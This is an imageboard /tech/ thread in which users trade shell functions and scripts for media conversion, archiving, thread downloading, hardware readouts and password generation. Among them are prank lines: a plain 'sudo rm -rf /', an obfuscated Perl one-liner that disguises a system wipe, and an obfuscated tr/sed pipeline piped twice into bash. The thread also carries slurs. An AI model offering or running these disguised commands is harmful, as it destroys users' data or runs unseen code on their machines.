[ / / / / / / / / / / / / / ] [ dir / aus / boxxy / choroy / dempart / f / jenny / jp / komica ]

/tech/ - Technology

Winner of the 75nd Attention-Hungry Games
/caco/ - Azarath Metrion Zinthos

March 2019 - 8chan Transparency Report
Comment *
Verification *
Password (Randomized for file and post deletion; you may also set your own.)
* = required field[▶ Show post options & limits]
Confused? See the FAQ.
Show oekaki applet
(replaces files and can be used instead)

Allowed file types:jpg, jpeg, gif, png, webm, mp4, pdf
Max filesize is 16 MB.
Max image dimensions are 15000 x 15000.
You may upload 3 per post.

File: fd42ed2ac444ec9⋯.jpg (1.66 MB, 2460x1573, 2460:1573, fd42ed2ac444ec95645e3277e3….jpg)


Post your shell commands or ideas for shell commands. I'm compiling a list. Here's what I got so far:


gimpresize(){ input="$1"; res="$2"; output="$3"; gimp -ib "(let* ((image (car (gimp-file-load RUN-INTERACTIVE \"$input\" \"\")))(drawable (car (gimp-image-get-active-layer image))))(gimp-image-scale-full image $res INTERPOLATION-LOHALO)(gimp-file-save RUN-NONINTERACTIVE image drawable \"$output\" \"\"))(gimp-quit 0)";}
# gimpresize input.png 1920\ 1080 output.png

imagemagickresize(){ input="$1"; res="$2"; output="$3"; convert $input -colorspace RGB +sigmoidal-contrast 12.09375 -filter Lanczossharp -distort resize $res -sigmoidal-contrast 12.09375 -colorspace sRGB $output;}
# imagemagickresize input.png 1920x1080 output.png

vidtogif(){ input="$1"; res="$2"; colors="$3"; output="$4"; ffmpeg -i $input -vf palettegen /tmp/palette.png && ffmpeg -i $input -i /tmp/palette.png -lavfi paletteuse $output && gifsicle -b -O3 --resize-width $res --colors $colors -i $output;}
# vidtogif input.webm 640 200 output.gif

vidtowebm(){ input="$1"; videoquality="$2"; audioquality="$3"; output="$4"; ffmpeg -i $input -vcodec libvpx-vp9 -b:v 0 -crf $videoquality -c:a libopus -b:a $audioquality -g 500 -threads 8 $output;}
# vidtowebm input.mp4 40 192K output.webm

vidtomp4(){ input="$1"; videoquality="$2"; audioquality="$3"; output="$4"; ffmpeg -i $input -c:v libx264 -crf $videoquality -profile high -level 5.1 -preset veryslow -pix_fmt yuv420p -c:a aac -b:a $audioquality $output;}
# vidtomp4 input.mkv 20 192K output.mp4

7zipmax(){ archive="$1"; directory="$2"; 7z a -t7z -mx9 -m0=lzma -mfb=273 -md=1024m -ms=on -mqs=on -myx=9 -mmc=200 -mlc=8 $archive $directory;}
# 7zipmax archive.7z directory/

tarmax(){ archive="$1"; directory="$2"; XZ_OPT="--lzma1=preset=9e,dict=1024MB,nice=273,depth=200,lc=4" tar --lzma -cf $archive $directory;}
# tarmax archive.tar.lzma directory/

screenshot(){ scrot -e "meh \$f || sxiv \$f || feh \$f || nomacs \$f && read -erp Upload\? -n1 yn && [ \\\$yn == y ] && curl -F upload=@\$f https://chiru.no";}
# screenshot

waifu2xmax(){ input="$1"; output="$2"; quality=$(identify -verbose $input | grep -oP "(?<=Quality: ).*"); noiselevel=3; [ $quality -gt 95 ] && noiselevel=2; [ $quality -gt 98 ] && noiselevel=1; parameters="-m noise_scale --noise_level $noiselevel --scale_ratio"; [ -z $quality ] && parameters="-m scale --scale_ratio"; iteration=2; while waifu2x-converter-cpp -i $input --force-OpenCL $parameters $iteration -o $output; do ((iteration++)); done;}
# waifu2xmax input.png output.png

mouseaccelerationdisable() { for i in {0..99}; do xinput set-prop $i "libinput Accel Profile Enabled" 0 1; done &> /dev/null;}
# mouseaccelerationdisable


Here are my scripts. Made for POSIX sh with rare exceptions like find -print0.



why'd you have them as functions instead of aliases in a .bashrc?



javac /home/random/javafile.class

java javafile

Now that’s how you compile a Java file, mommas dearest



Try to do an alias that does

echo foo "$@" bar



Nice! Thanks :)



ok but in that example it doesn't seem any less convenient than just running the regular command anyway



yep that's a one liner


sudo rm -rf /



>using rm -rf /

>not using

echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`~{;;y; -/:-@[-`{|~};`-{/" *-;;s;;$_;see'



why would you want to unironically triforce?


function _copy () { cat > /tmp/paste; }
function _paste () { cat /tmp/paste; }
function calc() { awk "BEGIN{print $@}"; }

# show man page for word under/right before cursor
# upon exiting man, the line is in the state you left it in
function man_on_word {
# if in between words, move position to the first one
while [ $TMP_POS -gt 0 ] && [ "${TMP_LN:TMP_POS:1}" = " " ]; do
true $((--TMP_POS))
while [ $TMP_POS -gt 0 ] && [ "${TMP_LN:TMP_POS:1}" != " " ]
do true $((--TMP_POS))
if [ 0 -ne $TMP_POS ]; then true $((++TMP_POS));fi
man "$TMP_WORD"
bind -x '"\C-k":man_on_word'
bind -m vi-command -x '"K":man_on_word' # for set -o vi

# ~/bin/ffconv:
# use like: find /foo/bar -name "*.webm" -print0 | xargs -P<Ncores> -0 -I{} ffconv -e mp3 -o /the/output/dir "{}" -q:a 7
# the arguments after "{}" are passed directly to ffmpeg
# has to be separate file, because of xargs
function runff() {
echo @@@@@@@@@@@@@@@@@@@@@@@@@@
echo -- ffmpeg "$@"
echo @@@@@@@@@@@@@@@@@@@@@@@@@@
ffmpeg -hide_banner "$@"


while [ $# -gt 0 ]; do case "$1" in
(-e) ext="$2"; shift 2;;
(-o) dir="$2"; shift 2;;
(-t) tag=1; shift 1;;
(*) break;;
if [ $# -lt 1 ]; then
echo "usage ${0##*/} [-e <ext>] [-o <out_dir>] [-t] <file> [<ffmpeg_arg1> [<ffmpeg_arg2>, ..] ]"
exit 1

if [ "$tag" = 1 ]; then
t=$(grep -o -P '$(\d+)' <<< "$file")
id3v2 -T "$t" "$file"

runff -i "$file" "$@" "$dir/${file%.*}.$ext"



Rate my WebM script:

#!/usr/bin/env sh

trap finish 1 2 14 15

finish ()
command rm -f -- "${PASSLOG}-0.log"
unset encode error finish help \
exit $1

help ()
command cat << EOF
Encode a video with VP9 codec using FFmpeg.

-h : display this help and exit
-q : set the encoding quality
between 0 and 63, 0 is lossless, default is 30
-t : set the number of threads to use
-f : do not prompt before overwriting

error ()
printf "%s: %s -- '%s'\n" "$NAME" "$1" "$OPTARG" >&2
finish 1

encode ()
printf 'Pass #%d...\n' $1
case "$1" in
1) TMP0='-y'
command ffmpeg -v error -stats $TMP0 \
-i "$INPUT" -map 0:v:0 -map_chapters -1 -map_metadata -1 \
-sws_flags lanczos+accurate_rnd+full_chroma_int+bitexact \
-c:v libvpx-vp9 -b:v 0 -auto-alt-ref 1 -lag-in-frames 25 \
-tile-columns 0 -frame-parallel 0 -aq-mode none -row-mt 1 \
-cpu-used 0 -deadline best \
-threads $THREADS -crf $QUALITY -lossless $LOSSLESS \
-pass $1 -passlogfile "$PASSLOG" -f ivf -bitexact -- "$TMP1"
return $?

NAME="`basename -- "$0"`"
THREADS=`grep -c ^processor /proc/cpuinfo`

while getopts hfq:t: TMP0; do
case "$TMP0" in
h) help ;;
f) OVERWRITE='-y' ;;
q) case "$OPTARG" in
*) error 'incorrect encoding quality' ;;
t) case "$OPTARG" in
if [ $OPTARG -gt $THREADS ]; then
error 'not enough CPU cores'
*) error 'incorrect number of threads' ;;
shift $((OPTIND-1))

if [ -z "$1" ]; then
if [ -z "$2" ]; then
PASSLOG="`basename -- "$OUTPUT"`"

encode 1 && encode 2

finish $?


File: cb7d3429aa0e290⋯.gif (Spoiler Image, 289.78 KB, 180x132, 15:11, 1531263452227-b.gif)


rem quick delete fetish porn folder

del c:\USERS\anon\progra~1\text\library\fap

del c:\panic.bat

shutdown -r


I hacked this together about a year ago, and it somehow works



containsElement () {
local e match="$1"
for e; do [[ "$e" == "$match" ]] && return 0; done
return 1

for userdir in "$@"
echo "$userdir"
if [[ "$userdir" = /* ]]; then

unset songs
declare -a songs
if [[ -d "${musicdir}" ]]; then
while read -r -d $'\0'; do
done < <(find "${musicdir}" -iname "*.flac" -printf "%P\0")
elif [[ -f "${musicdir}" ]]; then
songs[0]="$(basename "${musicdir}")"
musicdir="$(dirname "${musicdir}")"
echo "${songs[0]}"

declare mp3folder
if [[ ${#songs[@]} -eq 0 ]]; then
echo "no flacs found, skipping folder..."
elif [[ ${#songs[@]} -eq 1 ]]; then
song=$(basename "${songs[0]}")
/usr/bin/ffmpeg -i "${musicdir}/${songs[0]}" -acodec libopus -b:a 128K -vbr on -compression_level 10 "${mp3folder}/${songoutput}"
ln -s "${mp3folder}/${songoutput}" "/var/www/music/"
elif [[ ${#songs[@]} -gt 1 ]]; then
foldername="$(basename "$musicdir")"
for song in "${songs[@]}"; do
diskname="$(dirname "${song}")"
if [[ "$diskname" == "." ]]; then
containsElement "$diskname" "${disks[@]}"
if [[ $? -ne 0 ]]; then

mkdir "${mp3dir}/${foldername}"
for disk in "${disks[@]}"; do
mkdir "${mp3dir}/${foldername}/${disk}"

parallel --jobs=-1 -q /usr/bin/ffmpeg -i "${musicdir}/{}" -acodec libopus -b:a 128K -vbr on -compression_level 10 "${mp3dir}/${foldername}/{.}.opus" ::: "${songs[@]}"
pushd "$mp3dir"
zip -r "${foldername}.zip" "${foldername}"
ln -s "${mp3dir}/${foldername}.zip" "/var/www/music/"



Surprisingly benign, was expecting 'rm -rf ~ 2> /dev/null &'


I haven't posted here in awhile but here's a improved version of my external viewer script for w3m. depends on guile, mupdf, mpv, & wget. I keep meaning to write a downloader in guile as a replacement for wget but haven't gotten around to it yet. regardless it's quite robust and gets the job done.

#!/usr/local/bin/guile -s
(use-modules (ice-9 regex)) ; for match-string and regexp-substitute

(define (run-temporary url . proc)
; passes each file in a directory as a operand to a function.
(define (file-do proc path)
(define dir (opendir path))
(do ((entry (readdir dir) (readdir dir)))
((eof-object? entry))
(if (not (or (equal? entry ".") (equal? entry "..")))
(proc entry)))
(closedir dir))
; deletes all temporary files, the temporary directory, and then exits.
(define (safe-close path)
(file-do delete-file path)
(rmdir path)
; creates a temporary directory in a race condition free manner.
(define (mkdtemp path)
(catch 'system-error
(lambda () (mkdir path))
(lambda return
(let ((errno (system-error-errno return)))
(if (= errno EEXIST) (mkdtemp (tmpnam))))))
(define path (mkdtemp (tmpnam)))
; SIGHUP, SIGINT, & SIGQUIT are not needed due to being daemonized.
(sigaction SIGTERM (lambda (x) (safe-close path)) 0)
(chdir path)
; ftp is NOT PORTABLE replace with module gnutls and networking stack?
; or otherwise just replace with wget.
(system* "wget" url)
(file-do (lambda (x) (apply system* (append proc (list x)))) path)
(safe-close path))

(define (daemonize)
; double fork to prevent zombies on system-v derivatives.
(if (not (= (primitive-fork) 0)) (primitive-_exit 0) (setsid))
(if (not (= (primitive-fork) 0)) (primitive-_exit 0))
; close old stdin, stdout, & stderr
(close-fdes 0)
(close-fdes 1)
(close-fdes 2)
; redirect stdin, stdout, & stderr to /dev/null. dup->fdes isn't strictly
; necessary here because open automatically uses the lowest fde and we just
; closed the lowest three, but it makes things a bit more clear, and it's a
; good habit to have in case of threading.
(dup->fdes (open "/dev/null" O_RDONLY) 0)
(dup->fdes (open "/dev/null" O_WRONLY) 1)
(dup->fdes (open "/dev/null" O_WRONLY) 2))

(let ((still ".png|.jpg|.jpeg|.bmp|.pdf|.epub")
(loops ".gif|.webm")
(gallery "imgur.com/gallery/")
(album "imgur.com/a/")
(imgur "imgur")
(url (cadr (command-line))))

(cond ((string-match still url) (run-temporary url "mupdf"))
((string-match loops url) (run-temporary url "mpv" "--loop=inf"))
((string-match gallery url) (run-temporary
(regexp-substitute #f (string-match "gallery" url) 'pre "a" 'post "/zip") "mupdf"))
((string-match album url) (run-temporary (string-append url "/zip") "mupdf"))
((string-match imgur url) (run-temporary (string-append url ".jpg") "mupdf"))
(else (system* "mpv" "--ytdl-format=webm+bestaudio/720p/720p60" "--slang=en" url))))

And here's the script I use for screenshots, depends on ffmpeg and guile. once again robust and gets the job done, bar having to change screen size for different platforms.

#!/usr/local/bin/guile -s
(define (screen-file return)
(define (screen-file-iter number)
(define file-name (string-append (passwd:dir (getpwuid (getuid))) "/screen" (number->string number) ".png"))
(catch 'system-error
(lambda () (open file-name (logior O_CREAT O_EXCL)))
(lambda response
(if (= (system-error-errno response) EEXIST)
(screen-file-iter (+ number 1))
(begin (display response) (exit)))))
(return file-name))
(screen-file-iter 1))

(system* "ffmpeg" "-loglevel" "-8" "-f" "x11grab" "-video_size" "1366x768" "-i" ":0" "-vframes" "1" "-y" (call/cc screen-file))

I'm also considering rewriting my podcatcher shell script to use guile's XML parser and adding support for youtube channel RSS feeds so I can subscribe to a couple gardening channels I watch instead of manually visiting the RSS page every few weeks. I'll post it here when it's done if there is interest.


requesting a good wget/curl script to dl files from threads



That really isn't a hard thing to do.

I think i have one somewhere but basically all you need to do is

>curl thread link

>regex the file link which is typically media.8ch.net/file_store/[sha256][ext]

>wrap it all in a for loop and wget from that



Not exclusively for files, but I use this to archive the whole thread:

wget -bEHkprl 'inf' -So 'wget.log' \
--accept-regex="^https?://(media\.|softserve\.)?8ch\.net/((${B}/(res/${T}\.html|threads\.json)|main\.js)|(${B}/(thumb|src)|file_store(/thumb)?|js|static|stylesheets)/.*)$" \
--warc-cdx --warc-file="8ch.${B}.${T}" -nH -P "8ch.${B}.${T}" -- "https://8ch.net/${B}/res/${T}.html"

Where ${B} is the board directory (e.g. "tech") and ${T} is the thread number (e.g. "1003160").

And my wgetrc looks like this:

check_certificate   = off
ignore_length = on
inet4_only = on
restrict_file_names = nocontrol
retry_connrefused = on
robots = off
timestamping = on
tries = inf
trust_server_names = on
user_agent = Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36




Thanks, Anon.



If you wanted a robust way to do this in the future which works across imageboards you could pretty easily use the common API used by all imageboards to get the json data then parse and download from there.


This is a script I've used for quite a while to organize the files in my download directory by their mime type.


die () {
echo -e "\033[0;31m$*\033[m" >&2
exit 1


if [ ! -d "$DIR" ]; then
die "Not a valid dir you dumbutt!"

for file in "$DIR"/* ; do
if [ -f "$file" ]; then
mime=$(file -ib "$file" | cut -f1 -d ';')
if [ ! -d "$DIR/$mime" ]; then
mkdir -p "$DIR/$mime" || die "Couldn't make the directory $mime. Check if it already exists!"
mv "$file" "$DIR/$mime" || die "Moving the file $file to directory $mime failed!"
elif [ -d "$file" ]; then
echo "Skipping a directory $file"



die () {
echo -e "\033[0;31m$*\033[m" >&2
exit 1

Don't do that, use tput(1). If you redirect stderr to a file, it'll be stupid.

if [ ! -d "$DIR" ]; then
die "Not a valid dir you dumbutt!"

Should use

[ ! -d "$DIR" ] && die message

for short stuff like this

-mime=$(file -ib "$file" | cut -f1 -d ';')
+mime=$(file -b --mime-type -- "$file")

Don't forget to use -- to avoid shit with filenames starting with a dash. At your current level, I suggest you use shellcheck.



>Try to do an alias that does



> echo foo "$@" bar


Yeah, I do it all the time, why? not POSIX?


decodes to:

NOTE_B0=31; NOTE_C1=33; NOTE_CS1=35; NOTE_D1=37; NOTE_DS1=39; NOTE_E1=41; NOTE_F1=44; NOTE_FS1=46; NOTE_G1=49; NOTE_GS1=52; NOTE_A1=55; NOTE_AS1=58; NOTE_B1=62; NOTE_C2=65; NOTE_CS2=69; NOTE_D2=73; NOTE_DS2=78; NOTE_E2=82; NOTE_F2=87; NOTE_FS2=93; NOTE_G2=98; NOTE_GS2=104; NOTE_A2=110; NOTE_AS2=117; NOTE_B2=123; NOTE_C3=131; NOTE_CS3=139; NOTE_D3=147; NOTE_DS3=156; NOTE_E3=165; NOTE_F3=175; NOTE_FS3=185; NOTE_G3=196; NOTE_GS3=208; NOTE_A3=220; NOTE_AS3=233; NOTE_B3=247; NOTE_C4=262; NOTE_CS4=277; NOTE_D4=294; NOTE_DS4=311; NOTE_E4=330; NOTE_F4=349; NOTE_FS4=370; NOTE_G4=392; NOTE_GS4=415; NOTE_A4=440; NOTE_AS4=466; NOTE_B4=494; NOTE_C5=523; NOTE_CS5=554; NOTE_D5=587; NOTE_DS5=622; NOTE_E5=659; NOTE_F5=698; NOTE_FS5=740; NOTE_G5=784; NOTE_GS5=831; NOTE_A5=880; NOTE_AS5=932; NOTE_B5=988; NOTE_C6=1047; NOTE_CS6=1109; NOTE_D6=1175; NOTE_DS6=1245; NOTE_E6=1319; NOTE_F6=1397; NOTE_FS6=1480; NOTE_G6=1568; NOTE_GS6=1661; NOTE_A6=1760; NOTE_AS6=1865; NOTE_B6=1976; NOTE_C7=2093; NOTE_CS7=2217; NOTE_D7=2349; NOTE_DS7=2489; NOTE_E7=2637; NOTE_F7=2794; NOTE_FS7=2960; NOTE_G7=3136; NOTE_GS7=3322; NOTE_A7=3520; NOTE_AS7=3729; NOTE_B7=3951; NOTE_C8=4186; NOTE_CS8=4435; NOTE_D8=4699; NOTE_DS8=4978;
underworld_tempo=( 12 12 12 12 12 12 6 3 12 12 12 12 12 12 6 3 12 12 12 12 12 12 6 3 12 12 12 12 12 12 6 6 18 18 18 6 6 6 6 6 6 18 18 18 18 18 18 10 10 10 10 10 10 3 3 3 );
underworld_message=( "O" "P " "is " "a " "faggot" ".\n" "" "" "O" "P " "is " "a " "faggot" ".\n" "" "" "A " "big " "fucking " "faggot" ".\n" "" "" "" "A " "big " "fucking " "faggot" ".\n" "" "" "" "O" "P" " i" "s " "a " "f" "a" "g" "g" "o" "t.\n" "O" "P" " i" "s " "a " "f" "a" "g" "g" "ot.\n" );
_alarm() { { ( \speaker-test --frequency $1 --test sine )& pid=$!; sleep 0.${2}s; disown $pid; kill -9 $pid; } &> /dev/null; }; while true; do for((i=0;i<${#underworld[@]};i++)); do if [ ${underworld[$i]} -ne 0 ]; then printf "%b" "${underworld_message[$i]}"; _alarm ${underworld[$i]} ${underworld_tempo[$i]}; else sleep 0.${underworld_tempo[$i]}; fi; sleep 0.0${underworld_tempo[$i]}; done done

A simple repeating countdown timer to beep every $1 seconds:

alias beepe='function _beepe(){ watch -pbn $1 return 1; }; _beepe'
put it in .bashrc or equivalent
beepe 120

will beep every 2 minutes, since "return 1" causes the watch command to see a non-zero exit precisely (-p) every $1 seconds (-n $1) and perform the beep (-b)

Adjust to run in background, kill running jobs, etc as required.



Show me such an alias.



>Show me such an alias.




alias foofunc='function _foofunc(){ echo foo "$@" bar; }; _foofunc'

$foofunc such an alias
foo such an alias bar



not sure why you don't base64 the audio through aplay instead of speaker-test, or even use the -w option with speaker-test to play a wav file from stdin.




What's the point of an ALIAS in this case? You're not aliasing a name to anything, you're just recreating a function everytime for no reason. God, you're retarded.



Using that .wgetrc reports an incompatibility with the timestamping setting: "WARC output does not work with timestamping, timestamping will be disabled."

I put it verbatim (including the .wgetrc settings) into a script

#!/usr/bin/env bash
#save as thread-archive and chmod u+x thread-archive
wget -bEHkprl 'inf' -So 'wget.log' \
--accept-regex="^https?://(media\.|softserve\.)?8ch\.net/((${1}/(res/${2}\.html|threads\.json)|main\.js)|(${1}/(thumb|src)|file_store(/thumb)?|js|static|stylesheets)/.*)$" \
--warc-cdx --warc-file="8ch.${1}.${2}" -nH -P "8ch.${1}.${2}" \
-e 'check_certificate = off' \
-e 'ignore_length = on' \
-e 'inet4_only = on' \
-e 'restrict_file_names = nocontrol' \
-e 'retry_connrefused = on' \
-e 'robots = off' \
-e 'timestamping = on' \
-e 'tries = inf' \
-e 'trust_server_names = on' \
-e 'user_agent = Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36' \
-- "https://8ch.net/${1}/res/${2}.html"

Add checks to suit. I did the above basics to test it. Works great btw. Thanks anon.



> God, you're retarded.

>I don't understand why you did it, so you're retarded.


You can add unset if it makes you feel better. With an alias you can only use parameters at the end of the command, not within it. So defining a function is one way of getting around this, another is it invoke a subshell.

...ah fuck it, let me search for a source to spoonfeed you since you won't believe you're retarded anyway...

That didn't take long, here you go:


See the answer entitled "TL;DR: Do this instead"


>bash aliases do accept arguments, but only at the end:

>If you like circumventing limitations and doing what others say is impossible,...

that sounds like me, but certainly not you faggot.

> here's the recipe. Just don't blame me if your hair gets frazzled and your face ends up covered in soot mad-scientist-style.

>The workaround is to pass the arguments that alias accepts only at the end to a wrapper that will insert them in the middle and then execute your command.


>Solution 1

>If you're really against using a function per se, you can use:

>$ alias wrap_args='f(){ echo before "$@" after; unset -f f; }; f'

>$ wrap_args x y z

>before x y z after


>You can replace $@ with $1 if you only want the first argument.


>Explanation 1


>This creates a temporary function f, which is passed the arguments (note that f is called at the very end). The unset -f removes the function definition as the alias is executed so it doesn't hang around afterwards.

>Solution 2

>You can also use a subshell:



There's a misunderstanding. I meant why define an alias and not just the function itself in your config file?



>never mentioned config

>it's about config

sure it is. lel.

we both know it doesn't need to be aliased if it is a function in a config file. If it is, it is more for a particular users convenience.

e.g. >>1004590 would see all such defined alias returned with


which may be preferable to confine such definitions to the alias set, rather than wading through the output of

$declare -F

for functions which often contains a much longer list.



Enlighten me. I was always looking for a better way than this messy regexp.


>WARC output does not work with timestamping, timestamping will be disabled.

Ah, right, forgot about that. Thanks for reminding.

By the way, you don’t have to specify the .wgetrc options via the -e flag, unless you want to.

All of them—with the exception for the robots option—have a corresponding flag.

> “check_certificate = off” is --no-check-certificate

> “ignore_length = on” is --ignore-length

> “inte4_only = on” is -4

> “restrict_file_names = nocontrol” is --restrict-file-names=nocontrol

> “retry_connrefused = on” is --retry-connrefused

> “timestamping = on” is -N

> “tries = inf” is -t inf

> “trust_server_names = on” is --trust-server-names



>-e flag or corresponding flag

Thank you anon, I was doing a quick test so used the -e than looking up each option.


> use the common API used by all imageboards to get the json data then parse and download from there.


>Enlighten me. I was always looking for a better way than this messy regexp.

I think he means the json equivalent for every thread, including this one for example, change the .html to .json


It is easier to parse. for specific content to grab.


function mkcd() {
mkdir -p $*
cd $*




As I thought. Well, it might be easier to parse but you'll also have to turn it into something human-readable.



This is exceedingly unlikely to work on account of my compiler being broken and me using a bunch of things I haven't used before, but this is more or less what I was thinking. I'll try to fix my compiler and get gnutls working on my machine so that I can test it and fix it. Might take a second, turns out openbsd, guile, and gnutls don't play very nice together.

(use-modules (json)) ;; json-string->scm ;; https://github.com/aconchillo/guile-json
(use-modules (web uri)) ;; uri parse functions
(use-modules (web client)) ;; http-request

(define-syntax download-images
(syntax-rules ()
((images-download scheme host path response)
(lambda (post)
(call-with-output-file (string-append (assoc-ref post "tis") "." (assoc-ref post "ext))
(lambda (file-port)
#:host host
#:path path)) file-port)))
(assoc-ref response "posts")))))

(let* ((uri (string->uri (cadr command-line)))
(host (uri-host uri))
(path (split-and-decode-uri-path uri))
(board (car path))
(thread (string-split (car (last-pair path)) #\.))
(list-head path (- (length path) 1))
(string-append thread ".json")))
(uri-scheme uri)
#:host host
#:path (encode-and-join-uri-path api-path)))
(response (json-string->scm (http-request api-uri)))
(mkdir thread)
(chdir thread)
(cond ((equal? host "www.4chan.org")
(uri-scheme uri)
(string-append "/" board "/" (assoc-ref post "tis") "." (assoc-ref post "ext"))
((equal? host "www.8ch.net")
(uri-scheme uri)
(string-append (assoc-ref post "tis") "." (assoc-ref post "ext"))
(else ;; vichan default
(uri-scheme uri)
(string-append "/" board "/src/" (assoc-ref post "tis") "." (assoc-ref post "ext"))


>that pic

what did I miss?



I somehow read this as a scripting thread and not a shell thread, sorry for all the irrelevant posts. Anyway this is actually the third day I've been attempting to get gnutls to compile with the guile extentions to no avail, I'm considering looking into another implementation as OBSD and GNU just seem as though they weren't meant to mix to such a degree. I'll consider making another thread for scheme and post the finished thread file downloader there.



And I guess compiling the .class file again will turn it from bytecode into a real binary...



I'd just say fuck it, and alias every linux command to their windows equivalent and watch people lose their fucking minds.


freeram() { lsmod | awk "{print \$1}" | sudo xargs -I{} rmmod {} ; sudo /etc/init.d/udev restart ; sudo sysctl vm.drop_caches=3 }
# freeram




There's probably better ways to write this script (or just sort my data) but it does what I need.

>main music folder

>music folder I want to sync with my phone (don't want full library on there)

>copying files wastes disk space

>syncthing doesn't like sym links

>just wrote a script to find duplicate files without a hard link and create one

>now have 2 folders on desktop using no extra disk space

>hard link also means a tag update will update for both desktop folders and all synced devices






i never made this line, i stole it from someone on /tech/





i'm using this :


to slice clips to vp9 webm

There is an option to export as "Raw" but it results to big as fuck files. (1GB for a 10 second clip..) What do I need to modify to make it slice the clip without any re-encoding ?

Or do you know an alternative for fast slicing clip with mpv ?



For example this :


cut the video without any re-encoding

But it would be much better being able to do it with the previous script.



ffmpeg -i input.webm -ss 00:04:00 -t 180 -codec copy clip.webm

will copy from 4 minutes for 180 seconds, i.e. clip.webm is 3 minute long clip, which starts at 4 minutes into the original input.webm

you can use -ss before the input for an approximate fast search through longer videos (like a 2hr movie) then -ss after also so it picks up a keyframe - otherwise it will look like shit, or be out of sync.

ffmpeg -ss 01:00:00 -i input.webm -ss 00:04:00 -t 120 -codec copy clip.webm

would make a 2 minute clip starting 1 hour and 4 minutes into input.webm.



I know about that thanks but it is not practical when I want to cut 10 slices on a video. I want to do it directly via mpv with a keyboard shortcut.


wanted to post echoing that escape sequence that makes breaks your terminal to a point where it'll only displays hieroglyphs but it seems that I have to forgotten what the sequence was



>breaks your terminal to a point where it'll only displays hieroglyphs

=changing your terminal encoding. Sometimes it happens if you output a binary file to stdout.

UTF-8 encoding

echo -n $'\e%G'

Reset it with


stty sane

You may have to use Ctrl+j sequence in place of Return key if it got remapped too.



>tfw typing "st"

>accidentally booted into windows

>steam opens

It doesn't break babun though. Probably I have everything set to UTF-8 to begin with. I hope so at least. But yeah it was either that or some ancient sentinel character from the 70's/80's. Was reading a little more like a real word though.



*should make the terminal write backwards too




there's many escape codes the UTF-8 was but one example


File: 2455d7b4c1f61b2⋯.png (268.71 KB, 650x560, 65:56, 1479179457483.png)


wget -erobots=0 -nc -nd -nv -Rhtml,s.jpg -HErD media.8ch.net https://8ch.net/tech/res/1003160.html

This line works for most imageboards and imageboard archives. You only need to adjust the content domain. For example:

>i.warosu.org # warosu

>i.4pcdn.org # 4plebs



echo 4oCH4payCuKWsuKAhOKWsgo=|base64 -d


brightness(){ sudo sh -c 'for f in /sys/class/backlight/*; do echo $(($(<$f/brightness)'$1'*$(<$f/max_brightness)/100)) > $f/brightness; done';}
# brightness -5 / brightness +5


alias head='sed 11q'



absolute autism



Make it a function at least.




▲ ▲


temperature(){ for cputempdevice in /sys/class/hwmon/*; do cputempname=$(<$cputempdevice/name); if [[ $cputempname == "coretemp" || $cputempname =~ "k*temp" || $cputempname =~ "it87*" || $cputempname == "nct6775" ]]; then break; fi done; temp=$(<$cputempdevice/temp1_input); echo ${temp:0:-3}C;}
# temperature



Interesting. I've used this from an earlier thread but yours is more accurate.

temp=$(cat /sys/class/thermal/thermal_zone0/temp)
temp=$(echo "scale=1;(${temp}/1000)" | bc)
echo "${temp}°C"


sea shells sea shells by the sea shore.


fix for amd devices

temperature(){ for cputempdevice in /sys/class/hwmon/*; do cputempname=$(<$cputempdevice/name); [[ $cputempname == coretemp || $cputempname == it87* || $cputempname == nct6775 || $cputempname == k8temp || $cputempname == k9temp ]] && break; done; temp=$(<$cputempdevice/temp1_input); echo ${temp:0:-3}C;}



temps(){ for tempdevice in /sys/class/hwmon/*; do [ -f $tempdevice/temp1_input ] && echo "$(<$tempdevice/name) $(<$tempdevice/temp1_input)"; done;}
# temps


alias suicide='kill -9 $$'

function doubleclick(){ xdg-open "$@"; }


File: bd031e812012b49⋯.jpg (110.44 KB, 377x500, 377:500, 1537372072639.jpg)

x="${1:?}"; shift; y=("${@:?}")
for i in "${y[@]}"; do
man "${x}" \
| sed -n "s/.\\x08//g;/^\\s*${i}/,/^$/p" \
| fmt -w "${COLUMNS}"
complete -c 'boy'
$ boy grep -G -E -P
-G, --basic-regexp
Interpret PATTERN as a basic regular
expression (BRE, see below). This is
the default.

-E, --extended-regexp
Interpret PATTERN as an extended regular
expression (ERE, see below).

-P, --perl-regexp
Interpret the pattern as a
Perl-compatible regular expression
(PCRE). This is experimental and grep
-P may warn of unimplemented features.



Nifty idea, until you miss the option caveats written elsewhere in the text.

If I need a refresher on an option I take it as an opportunity to learn/find better way of doing something.

$grep --help



>use tput(1)

What's the proper procedure if my tput is BSD? Should I check for the existence of /usr/local/bin/tput and use that instead? Reason for asking is that tput on dflybsd (and probably other BSD) don't know anything about screen or tmux.

$ which tput
$ echo -n Hi; tput ch 0; tput ce; echo Hello
$ alias tput=/usr/local/bin/tput
$ echo -n Hi; tput ch 0; tput ce; echo Hello

Also nice that ncurses' tput accepts terminfo capability names;



I don't know, just look at man 1p tput for the POSIX spec and whine to your OS maintainers if it doesn't comply.



ANSI escape codes is probably more portable and less trouble.



echo 'carl the moongeek/o.lye10uA8/C' | tr gnu/homekat :phisth/bu\- | sed s./.L. | bash | bash



I figured so and it's what I've been using.

I'd much rather run

printf "Hello"; sleep 1; printf "\x1b[G\x1b[K\x1b[1;34mHi\x1b[m\n"

than bringing tput into things.



>readability matters

Set variables for the settings:

Bold=$(tput bold) ;\
Reg=$(tput sgr0) ;\
echo "Regular and ${Bold}some bold${Reg} text"


Real simple function I use at work constantly:

```sgrep() {

grep -i "$1" ~/.ssh/config


Never know when you'll need to send someone the connection details for a server.



Man, that's embarrassing. To make up for my shoddy markup here's a one liner I use for generating passwords for databases and shit where it doesn't matter if I can remember it or not:


tr -dc '[:alnum:]' < /dev/urandom | fold -w 30 | sed 1q




Fuck sake I really can't remember the 8ch formatting



I use this instead:

#!/usr/bin/env sh
[ "$1" = '-s' ] && { F='[:alnum:]'; shift 1; } || F='[:graph:]'
[ "$1" -gt 0 ] 2> /dev/null && N=$1 || N=32
tr -cd $F < /dev/urandom | fold -bw $N | head -1
unset F N


passgen(){ echo -n Generating password...\ ; head -c 100 /dev/random | tr -cd "[:print:]"; echo;}
# passgen



# cd to the given file
function cdf() {
file=$(which "$*")
if [[ -f "${file}" ]]; then
cd "$(dirname "${file}")"
echo "'$*' does not exist."

